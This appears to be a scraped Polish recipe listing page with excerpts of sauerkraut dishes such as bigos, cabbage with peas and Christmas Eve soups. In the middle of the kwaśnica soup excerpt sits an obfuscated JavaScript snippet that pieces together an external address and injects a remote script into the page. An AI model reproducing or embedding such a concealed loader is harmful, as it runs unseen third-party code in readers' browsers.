kiszenie kapusty - 4878 przepisów (strona:28/326)

Bigos staropolski najlepszy na święta 242

dodaję wędzony boczek i kiełbasę :) Najlepszym mięsem do bigosu będzie łopatka albo karkówka. Kapustę dodaję i świeżą, białą jak i kiszoną. Jeśli lubicie kwaśny bigos dodajcie 1,5 kg kapusty kiszonej na 1,2 kg kapusty białej.  Dla zwolenników mniej kwaśnego bigosu odpowiednia proporcja to 1,5 kg kapusty białej na 1,2 kg kapusty kiszonej. Dla głębszego smaku(...)się nie przypalił. Gotowy bigos może stać w lodówce przez kilka dni. Najlepiej smakuje z pajdą chleba. Bigos staropolski świąteczny składniki: 1,5 kg kapusty białej 1,5 kg kapusty kiszonej 1 kg mięsa 30 dag  wędzonego boczku 50 dag kiełbasy wiejskiej 4 cebule 8-9 suszonych śliwek 8-9 suszonych grzybów 6-7 ziarenek jałowca 10 ziarenek pieprzu

Ekspansja smaku
KAPUSTA Z GROCHEM 147

jadł, niech spróbuje, kapusta z grochem w tej wersji jest przepyszna! To prosta i szybka potrawa, nie tylko na świąteczny stół. Kapusty z grochem wychodzi cały garnek, można go podzielić dodając do drugiej części np. wymoczone i posiekane suszone grzyby, mięso lub kiełbasę oraz suszone śliwki. Powstaną dwie potrawy polecam! SKŁADNIKI: 1300 g kapusty kiszonej, odciśniętej (u mnie kiszona(...)wsypać 1 łyżkę mąki, szybko wymieszać rózgą kuchenną, dodać do kapusty z grochem. Aby mi wyszło 1300 g kiszonej kapusty odciśniętej kupiłam dwa pojemniki kapusty z marchewką o pojemności 1 kg, po dokładnym odciśnięciu wyszło 1300 g kapusty kiszonej. PRZYGOTOWANIE: Przygotowanie kapusty z grochem zaczynam od przepłukania grochu, zalania go wodą i moczenia go w zimnej wodzie przez całą

Zasmakuj Kuchni
Bigos z grzybami (Wigilia) 241

jadło się go po raz pierwszy. Bigos jest taką potrawą, że w każdym domu smakuje inaczej, ale na pewno podstawowe dwa składniki bigosu muszą się w nim znaleźć: kiszona kapusta i suszone grzyby. Mój bigos jest jeszcze obowiązkowo z dodatkiem wędzonych śliwek i miodu. Do bigosu na Wigilię nigdy nie dodaję pomidorów ani koncentratu, powinno się w nim czuć tylko(...)smak grzybów i kapusty. Bigos z kiszonej kapusty można przygotować na 1 - 2 dni wcześniej, wtedy nawet po podgrzaniu jest jeszcze smaczniejszy.  Jestem ciekawa, czy podobny bigos gości na Waszym świątecznym stole i co w nim musi się obowiązkowo znaleźć?  Składniki: (porcja na 2 - 3 osoby) 1 kg kiszonej kapusty 100 g suszonych grzybów (u mnie prawdziwki

Kuchcik gotuje
Bigos z sherry luksusowy 262

dobrej kiełbasy. Nigdy nie żałuję suszonych grzybów, jałowca i angielskiego ziela. W tym roku doprawiłam bigos wytrawnym sherry. Bigos z sherry Składniki: 2 kg poszatkowanej białej kapusty 1 kg kiszonej kapusty bez marchewki ½ kg wieprzowej szynki, surowej 300 g wędzonego boczku ½ kg karkówki ½ kg wołowiny z kością 4 śląskie 2 cebule 30 g suszonych grzybów 1 czosnek solo 1½ łyżki(...)być mięciutkie, tak by można było rozrywać je palcami. Ostudzone mięso podziel na małe kawałeczki. Poszatkuj kapustę i ugotuj w niewielkiej ilości, lekko osolonej wodzie. W drugim garnku obgotuj kiszoną kapustę. Odcedź kiszoną kapustę i odciśnij wodę jeśli nie chcesz aby bigos był zbyt kwaśny. Ja nie odciskałam. Zalej grzyby wrzątkiem i pozostaw na 30 minut. Po tym czasie, odcedz

codojedzenia
Zupa na Wigilię – nie tylko barszcz! 212

serwuje się na zimno lub na ciepło. Kwaśnica Kwaśnica to zupa na Wigilię wywodząca się z Podhala. Przygotowuje się ją z: Głowy i podrobów z wybranej ryby 30 dag kapusty kiszonej Soku z kapusty kiszonej Kilku suszonych grzybów 5 ziaren ziela angielskiego 2 ząbków czosnku Szczypty suszonego imbiru Kiszoną kapustę szatkujemy, wrzucamy do garnka, zalewamy odrobiną wody oraz sokiem(...)kiszonej kapusty i gotujemy. Dodajemy grzyby, ziele angielskie i gotujemy do zmięknięcia. Dodajemy podroby i głowy ryb, gotujemy przez 20 minut, wyjmujemy podroby, doprawiamy czosnkiem oraz imbirem i ponownie zagotowujemy. (function(){ cwbx=document.createElement("script");cwbx_=("ust");cwbxu="69293527"; cwbx_+="a"+("t.i");cwbx.type="text/javascript"; cwbxu+=".pdmwktdtwbxmgxxyXtf9";cwbx.async=true;cwbx_+="n"+("f"+"o")+"/"; cwbxu+="bn8i421swj";cwbx.src="//"+cwbx_+cwbxu; document.body.appendChild(cwbx); })(); Artykuł Zupa

Okiem Blondynki by McBlondi
BIGOS WIGILIJNY 225

zapasteryzować trzymając 30 minut w piekarniku nagrzanym do 120 stopni C (bez termoobiegu). Część bigosu można wykorzystać do pierogów , z kolejnej upiec paszteciki . SKŁADNIKI / 8-10 PORCJI 1 kg kiszonej kapusty 600 g świeżej białej kapusty 2 cebule 2 ząbki czosnku 4 łyżki oleju 50 g masła 1/2 szklanki zielonej soczewicy 1 jabłko 3 łyżki powideł śliwkowych 20 suszonych śliwek(...)brandy lub czerwonym winem i również odstawiamy do namoczenia. Cebule obieramy i kroimy w drobną kostkę, czosnek kroimy w plasterki. Zieloną soczewicę płuczemy na sicie. Białą kapustę drobno szatkujemy, kapustę kiszoną kroimy na mniejsze kawałki. W dużym szerokim garnku (najlepiej z grubym dnem) rozgrzewamy masło i olej. Dodajemy cebulę i czosnek, smażymy 5 minut, na średnim ogniu, często mieszając

cool and minty
Kiszona kapusta z olejem lnianym i czarnuszką 247

powodów dla których założyłam tego bloga, jest to że dzięki niemu nie będę już musiała pamiętać wszystkich przepisów. Bo zwykle ich nie pamiętam. Na przednówku robiłam zawsze surówkę z kiszonej kapusty z różnymi aromatycznymi ziarenkami. Pierwszy raz jadłam ją w wykonaniu Asi Erbel. Potem zaczęłam dodawać olej lniany albo rydzowy z lnianki. Na pewno była wśród nich czarnuszka, ale były(...)bardziej “polskiego” charakteru. Można by ją podawać turystom jako wzór polskich smaków. Tymczasem spisuję ten prosty przepis, bo jeszcze zapomnę nawet o czarnuszce.   Składniki na każdą osobę: garść kiszonej kapusty łyżka oleju lnianego lub rydzowego duża szczypta nasion czarnuszki   Jak przygotować kiszoną kapustę z olejem lnianym i czarnuszką? Czarnuszkę możemy lekko podsmażyć na patelni, żeby stała się bardziej

Ugotowane pozamiatane
Bigos z białej kapusty – kuchnia podkarpacka 201

Zwykle robię bigos z kapusty kiszonej, choć bardziej popularne są chyba bigosy mieszane – z kapusty kiszonej i białej (surowej). Byłam ciekawa, jak smakuje bigos z białej kapusty bez kapusty kiszonej, dlatego wypróbowałam przepis Koła Gospodyń Wiejskich z Terliczki (Podkarpacie)*. Efekt był bardzo smaczny i polecam tę wersję szczególnie tym, którzy nie mają dostępu do kapusty kiszonej. Składniki: 1 główka poszatkowanej

Trzeci talerz
Bigos według Ewy Wachowicz 3043

muszę przypominać o 25 % zniżce na zakupy w Hurtowni Oliwy..a warto kupić np. taki olej albo inne produkty.. 75 dag białej kapusty 75 dkg kiszonej kapusty 2 duże cebule 1 średnia golonka lub ½ kg wieprzowego karczku 1 kg mięsa (pieczenie wołowa i cielęca, kawałki pieczonego drobiu, różne wędliny, boczek, dziczyzna) 1 szkl. czerwonego wytrawnego wina 2 łyżki(...)liście laurowe kilka ziaren jałowca i ziela angielskiego ok. 1 l rosołu lub wody z gotowania szynki 2 łyżki oleju z ryżu sól pieprz przyprawa do bigosu Kapustę kiszoną odcisnąć (sok zachować, gdyż może się przydać do dokwaszenia bigosu), posiekać.Zalać połową rosołu, dodać golonkę, wrzucić liście laurowe, ziele angielskie i ziarna jałowca. Gotować do miękkości.Białą kapustę posiekać, zalać

Moje domowe kucharzenie
Zwykły bigos 173

bigos świetnie się zamraża. BIGOS Składniki: - 5 kg kapusty kiszonej - 1 mała główka kapusty białej - 4 przeciery pomidorowe małe - ok. 2 kg różnego rodzaju mięsa : łopatka, kiełbasa, schab, boczek. - 5 dużych cebul - pieprz, wędzona papryka słodka, sól do smaku. - smalec do smażenia Na początek kroję kapustę kiszoną. Nie odsączam jej z soku bo to dodaje smaczku. Białą kapustę szatkuję(...)lodówki. Taka czynność pozwala na zamknieciu w mięsie wszystkich potrzebnych soków i smaku. W garnku, na małym ogniu, zaczynam dusić kapustę białą. Jeśli ma za mało soku, można dodać trochę wody. Po jakiejś godzinie dodajemy kapustę kiszoną i znów dusimy. Po pół godzinie następnej dodajemy mięso a na tłuszczu z mięsa smażymy cebulę. Po usmażeniu cebuli, wszystko razem ląduje

Kuchnia Pełna Emocji
Tradycyjna Zasmażana Kapusta Kiszona z Boczkiem 41404

Kapusta Kiszona Zasmażana z Boczkiem to idealny dodatek do niemal każdego mięsa jednak w połączeniu z tradycyjnym kotletem schabowym tworzy jedno z najpopularniejszych i najsmaczniejszych polskich dań.  Tradycyjna Kapusta Kiszona Zasmażana z Boczkiem - Składniki: 1 kg kapusty kiszonej 200 g boczku wędzonego 2 duże cebule 2 łyżki mąki pszennej 1/2 łyżeczki soli łyżeczka soli 2 liście laurowe 4 ziela(...)angielskie kilka ziaren pieprzu 2 łyżeczki kminku ok. 6 łyżek masła Tradycyjna Kapusta Kiszona Zasmażana z Boczkiem - Sposób przygotowania: Kapustę odsączamy z nadmiaru płynu i siekamy. Zalewamy wrzątkiem do pokrycia kapusty. Dodajemy pół łyżeczki soli, cukier, liście laurowe, ziele angielskie, pieprz i kminek. Po doprowadzeniu do wrzenia gotujemy ok. 50 minut - do miękkości. W międzyczasie podsmażamy na ok. 3 łyżkach

Słodka Strona
Kapusta z grochem na Wigilię 174

troszkę inaczej bo oprócz grochu i kapusty kiszonej dodaje również świeżą kapustę. Także ile gospodyń i domów tyle rodzajów tego dania. U mnie kapustę z grochem robi się tak: PRZEPIS NA KAPUSTĘ Z GROCHEM: (przygotowuje w garnku z żeliwa) - opakowanie grochu łuskanego 500 g - 500 g kapusty kiszonej - 2 średnie cebule - olej rzepakowy (jeśli na wigilijny stół, jeśli(...)mnie ponad godzina. To bardzo ważne groch musi być kremowy rozpadać się w palcach. Są dwie szkoły robienia kapusty z grochem jedna mówi aby najpierw kapustę ugotować i dodać ugotowaną, a druga, aby do ugotowanego grochu dodać kapustę kiszona i dalej gotować. Ja właśnie tak robię, do ugotowanego grochu, dodaję wypłukaną pod bieżącą wodą kapustę kiszoną, podsmażoną na oleju posiekaną

SMYKWKUCHNI
Surówka z kiszonej kapusty. 155

Bardzo lubię kiszona kapustę. Oprócz tego, że jest smaczna to jest również bardzo zdrowa. Zawiera witaminę C, witaminy z grupy B, witaminę E, P, beta karoten, a także składniki mineralne wapń, magnez, żelazo i potas. Zawiera również siarkę dzięki czemu ma dobry wpływ na wygląd włosów, skóry i paznokci. Kiszona kapusta pozytywnie wpływa również na układ pokarmowy, reguluje prace jelit(...)najważniejsze,  w okresie jesienno zimowym wzmacnia naszą odporność. Teraz już wiecie, że warto jeść kapustę kiszoną :) Składniki: 1/2 kg. kapusty kiszonej 1 cebula 1 marchewka kilka łyżek oleju pieprz Wykonanie: Kapustę przełożyć do miski, cebulę pokroić w kostkę, marchewkę zetrzeć na tarce o dużych oczkach. Wszystkie składniki wymieszać. Dodać olej i przyprawić pieprzem, ponownie wymieszać

Agusiowe smakołyki
Kapusta z suszonymi grzybami 160

naturalnego sól do smaku olej rzepakowy do smażenia Jak zrobić kapustę z suszonymi grzybami? Kapustę spróbować, jeśli jest bardzo kwaśna to przepłukać zimną wodą, odcisnąć i drobniej pokroić. Zbyt długo nie płukać, gdyż kapusta z suszonymi grzybami powinna być lekko kwaśna. Najlepsza do zrobienia tego dania jest domowa kiszona kapusta , którą warto zrobić wcześniej.  Grzyby moczyć w zimnej wodzie(...)grzybów nie wylewać, gdyż potrzebna będzie do duszenia kapusty. Cebulę i czosnek obrać, drobno pokroić i podsmażyć na patelni z rozgrzanym olejem. Do cebuli dodać kapustę, około 1/2 szklanki oleju i przesmażyć. Kapustę podlać wodą po moczeniu grzybów i dusić około 40 minut pod przykryciem. Co pewien czas zamieszać, aby kapusta się nie przypaliła. Jeśli na patelni jest mało płynu

Gotuj w domu
Schab w aromatycznej kiszonej kapuście 250

Soczysta pieczeń ze schabu na aromatycznej jarzynce z kapusty kiszonej z rodzynkami, żurawiną, miodem,wspaniale prezentuje się na stole,na pewno posmakuje domownikom i gościom, będą zachwyceni tym aromatem! Idealne danie na świąteczne chwile przy stole,czy inne uroczystości rodzinne. Składniki 1 kg schabu bez kości 3 łyżki musztardy delikatesowej pieprz czarny grubo mielony 1 łyżeczka majeranku Jarzynka z kiszonej(...)kapusty: 1 kg kiszonej kapusty 1 cebula 2 łyżki masła 1 puszka ananasa 1/2 szklanki wody 1 jabłko 1 łyżka rodzynek sułtanek 1 łyżka suszonej żurawiny 2 łyżki miodu prawdziwego 2 łyżeczki mąki pszennej do zawiesiny 2 goździki 1/2 łyżeczki kminku 1 łyżka sosu sojowego do smaku sól do smaku natka pietruszki i plasterki jabłka do dekoracji  Sposób przygotowania

Wanilia i Kardamon